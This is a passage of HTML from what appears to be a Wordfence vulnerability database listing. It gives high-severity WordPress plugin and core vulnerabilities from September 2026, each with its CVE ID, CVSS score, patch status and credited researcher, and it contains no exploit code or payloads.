</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f9613d32-719c-409a-b1ea-345c341ff39c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2e4a9e9a-7bdc-4f51-ac3f-d6627b4f62c7" target="_blank" rel="noopener">Jeg Kit for Elementor &lt;= 3.2.16 &#8211; Unauthenticated Stored Cross-Site Scripting via Comment Content</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18405" target="_blank" rel="noopener noreferrer">							CVE-2026-18405						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jeg-elementor-kit" target="_blank" rel="noopener">Jeg Kit for Elementor – Powerful Addons for Elementor, Widgets &amp; Templates for WordPress</a> <span class="wfvr-software-slug">[jeg-elementor-kit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2e4a9e9a-7bdc-4f51-ac3f-d6627b4f62c7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b8acccc1-ddc9-4daa-8aaa-71efc5ef2f04" target="_blank" rel="noopener">Master Blocks 1.4.1 &#8211; 1.4.1.4 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-88824" target="_blank" rel="noopener noreferrer">							CVE-2026-88824						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-blocks-for-gutenberg" target="_blank" rel="noopener">Master Blocks – Ultimate Blocks for Marketers</a> <span class="wfvr-software-slug">[ultimate-blocks-for-gutenberg]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/enrico-marcolini" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c0a6ffe28510a376b315b173938329b1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0a6ffe28510a376b315b173938329b1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/enrico-marcolini" target="_blank" rel="noopener">Enrico Marcolini</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b8acccc1-ddc9-4daa-8aaa-71efc5ef2f04" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ed8cb22d-cd8c-482e-a295-4717717d6b83" target="_blank" rel="noopener">MotoPress Hotel Booking &lt;= 6.2.4 &#8211; Unauthenticated Stored Cross-Site Scripting via Stripe Webhook Event Object &#8216;id&#8217;</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-90650" target="_blank" rel="noopener noreferrer">							CVE-2026-90650						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/motopress-hotel-booking-lite" target="_blank" rel="noopener">MotoPress Hotel Booking</a> <span class="wfvr-software-slug">[motopress-hotel-booking-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e0f701652a71213d4d5afd11c6694ce0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e0f701652a71213d4d5afd11c6694ce0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener">h0xilo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ed8cb22d-cd8c-482e-a295-4717717d6b83" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f34871a0-6556-447b-8c17-14235be47f55" target="_blank" rel="noopener">NextGEN Gallery &lt;= 4.4.0 &#8211; Authenticated (Admin+) Arbitrary File Upload</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81650" target="_blank" rel="noopener noreferrer">							CVE-2026-81650						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/nextgen-gallery" target="_blank" rel="noopener">Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery</a> <span class="wfvr-software-slug">[nextgen-gallery]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/alihan-sahin" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ada42d21bcb1f3fa76a6f4a779247ab1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ada42d21bcb1f3fa76a6f4a779247ab1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/alihan-sahin" target="_blank" rel="noopener">Alihan Şahin</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f34871a0-6556-447b-8c17-14235be47f55" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5840255d-5454-445b-b876-94747d981338" target="_blank" rel="noopener">Optimole &lt;= 4.2.11 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84829" target="_blank" rel="noopener noreferrer">							CVE-2026-84829						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/optimole-wp" target="_blank" rel="noopener">Optimole – Optimize Images | Convert WebP &amp; AVIF | CDN &amp; Lazy Load | Image Optimization</a> <span class="wfvr-software-slug">[optimole-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5840255d-5454-445b-b876-94747d981338" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ea8b1eee-2e3f-4d61-b815-4ea0aaa188b5" target="_blank" rel="noopener">Popup Maker &lt;= 1.24.0 &#8211; Unauthenticated Stored Cross-Site Scripting via values[Name] Parameter</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-87915" target="_blank" rel="noopener noreferrer">							CVE-2026-87915						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/popup-maker" target="_blank" rel="noopener">Popup Maker – Boost Sales, Conversions, Optins, Subscribers with the Ultimate WP Popup Builder</a> <span class="wfvr-software-slug">[popup-maker]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/n4kk0" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/30be710f698d639149a73105e793c201.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="30be710f698d639149a73105e793c201"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/n4kk0" target="_blank" rel="noopener">Naoya Takahashi (nakko)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ea8b1eee-2e3f-4d61-b815-4ea0aaa188b5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1261881f-7a04-47fb-8176-6a9ac2088f8d" target="_blank" rel="noopener">Quill Forms | Conversational Multi Step Forms, Surveys &amp; quizzes &lt;= 5.7.1 &#8211; Unauthenticated Stored Cross-Site Scripting via Multiple Choice &#8216;Other&#8217; Value</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15664" target="_blank" rel="noopener noreferrer">							CVE-2026-15664						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quillforms" target="_blank" rel="noopener">Quill Forms | Conversational Multi Step Forms, Surveys &amp; quizzes</a> <span class="wfvr-software-slug">[quillforms]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zickzick2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bc0ca0683e2f48d801834cc849d05ed9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bc0ca0683e2f48d801834cc849d05ed9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/zickzick2" target="_blank" rel="noopener">zickzick2</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1261881f-7a04-47fb-8176-6a9ac2088f8d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4cad9170-0121-45b0-a1a5-7519be0a381e" target="_blank" rel="noopener">Royal Elementor Addons &lt;= 1.7.1066 &#8211; Unauthenticated Arbitrary HTML Injection in Notification Emails</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13407" target="_blank" rel="noopener noreferrer">							CVE-2026-13407						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/royal-elementor-addons" target="_blank" rel="noopener">Royal Addons for Elementor – Addons and Templates Kit for Elementor</a> <span class="wfvr-software-slug">[royal-elementor-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/brian-willows" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/22d12b4c44e574b32a29d063142b8954.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="22d12b4c44e574b32a29d063142b8954"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/brian-willows" target="_blank" rel="noopener">Brian Willows</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4cad9170-0121-45b0-a1a5-7519be0a381e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d84be1a7-87b2-430b-9db1-a6b227e23d11" target="_blank" rel="noopener">To Do List Member 1.4  &#8211; 1.6 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86801" target="_blank" rel="noopener noreferrer">							CVE-2026-86801						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/todo-lists-for-membership-sites" target="_blank" rel="noopener">To Do List Member</a> <span class="wfvr-software-slug">[todo-lists-for-membership-sites]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f3c692ed07bf523cecfd7059647628e4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f3c692ed07bf523cecfd7059647628e4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pablo-gonzalez-perez" target="_blank" rel="noopener">Pablo González Pérez</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez-vicente" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5e4a88d0e051bd28b5801dec8832d1dc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5e4a88d0e051bd28b5801dec8832d1dc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/francisco-jose-ramirez-vicente" target="_blank" rel="noopener">Francisco José Ramírez Vicente</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/inigo-sanchez-enciso" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/29b46a01d00d863d59895bdf88bc4921.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="29b46a01d00d863d59895bdf88bc4921"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/inigo-sanchez-enciso" target="_blank" rel="noopener">Iñigo Sánchez Enciso</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d84be1a7-87b2-430b-9db1-a6b227e23d11" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/43c44e1a-3b53-44e9-8233-2a4dbea4fa12" target="_blank" rel="noopener">Ultimate Member &lt;= 2.13.0 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85680" target="_blank" rel="noopener noreferrer">							CVE-2026-85680						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-member" target="_blank" rel="noopener">Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction &amp; Membership Plugin</a> <span class="wfvr-software-slug">[ultimate-member]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b83998e318a17b004dfe1f66689a2125.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b83998e318a17b004dfe1f66689a2125"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/karthik-ramakrishnan" target="_blank" rel="noopener">Karthik Ramakrishnan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/43c44e1a-3b53-44e9-8233-2a4dbea4fa12" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0635264e-91d0-4855-b811-dcbf724b3400" target="_blank" rel="noopener">VikBooking 1.8.8 &#8211; 1.8.14 &#8211; Unauthenticated Stored Cross-Site Scripting via SVG Upload</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85127" target="_blank" rel="noopener noreferrer">							CVE-2026-85127						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/vikbooking" target="_blank" rel="noopener">VikBooking Hotel Booking Engine &amp; PMS</a> <span class="wfvr-software-slug">[vikbooking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/anhdung1329" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/59aa670a7e8efd95bdb8f5b0bc55a0db.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="59aa670a7e8efd95bdb8f5b0bc55a0db"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/anhdung1329" target="_blank" rel="noopener">anhdung1329</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0635264e-91d0-4855-b811-dcbf724b3400" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/63f1c687-fa2d-4882-9bcd-68b6d8dfae8a" target="_blank" rel="noopener">Visitor Traffic Real Time Statistics pro &lt;= 11.21 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-90986" target="_blank" rel="noopener noreferrer">							CVE-2026-90986						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/visitors-traffic-real-time-statistics-pro" target="_blank" rel="noopener">Visitor Traffic Real Time Statistics pro</a> <span class="wfvr-software-slug">[visitors-traffic-real-time-statistics-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/429c3eb56bea605e95a57ae93ae24c62.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="429c3eb56bea605e95a57ae93ae24c62"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh" target="_blank" rel="noopener">Nguyen Ba Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/63f1c687-fa2d-4882-9bcd-68b6d8dfae8a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1984abee-a74c-48d7-874f-c4421243e5e5" target="_blank" rel="noopener">WordPress Core &lt;= 7.1 &#8211; Unauthenticated Stored Cross-Site Scripting via wpautop() Blockquote Handling</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-93485" target="_blank" rel="noopener noreferrer">							CVE-2026-93485						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/" target="_blank" rel="noopener">WordPress</a> <span class="wfvr-software-slug">[wordpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/bdcb43576544351fa89720015a32ba9b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="bdcb43576544351fa89720015a32ba9b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/rafie-muhammad" target="_blank" rel="noopener">Rafie Muhammad</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1984abee-a74c-48d7-874f-c4421243e5e5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4f537db6-52d1-4606-af19-e72930a6ece4" target="_blank" rel="noopener">WP Inventory Manager &lt;= 2.5.4 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
